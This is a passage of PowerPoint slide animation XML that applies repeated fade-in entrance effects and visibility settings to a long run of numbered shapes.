                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="158" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2130"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="159" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2130"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="160" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="161" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2131"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="162" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2131"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="163" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="164" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="165" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2132"/>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2133"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="168" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2133"/>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2134"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="171" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2134"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="172" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="173" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2135"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="174" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2135"/>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2140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="177" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2140"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="178" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="179" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2141"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="180" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2141"/>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2211"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="183" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2211"/>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2212"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="186" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2212"/>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2213"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="189" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2213"/>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2214"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="192" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2214"/>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2215"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="195" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2215"/>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2216"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="198" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2216"/>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2217"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="201" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2217"/>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2218"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="204" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2218"/>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2221"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="207" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2221"/>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2222"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="210" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2222"/>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2223"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="213" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2223"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="214" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="215" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2224"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="216" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2224"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="217" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="218" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2225"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="219" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2225"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="220" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="221" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2226"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="222" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2226"/>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2228"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="225" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2228"/>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2229"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="228" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2229"/>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2230"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="231" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2230"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="232" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="233" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2232"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="234" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2232"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="235" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="236" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2233"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="237" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2233"/>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2234"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="240" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2234"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="241" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="242" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2235"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="243" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2235"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="244" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="245" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2236"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="246" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2236"/>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2237"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="249" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2237"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="250" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="251" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2239"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="252" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2239"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="253" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="254" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2241"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="255" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2241"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="256" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="257" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2245"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="258" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2245"/>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2246"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="261" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2246"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="262" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="263" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2247"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="264" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2247"/>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2248"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="267" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2248"/>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2249"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="270" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2249"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="271" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="272" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2250"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="273" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2250"/>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2251"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="276" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2251"/>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2252"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="279" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2252"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="280" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="281" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2253"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="282" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2253"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="283" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="284" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2254"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
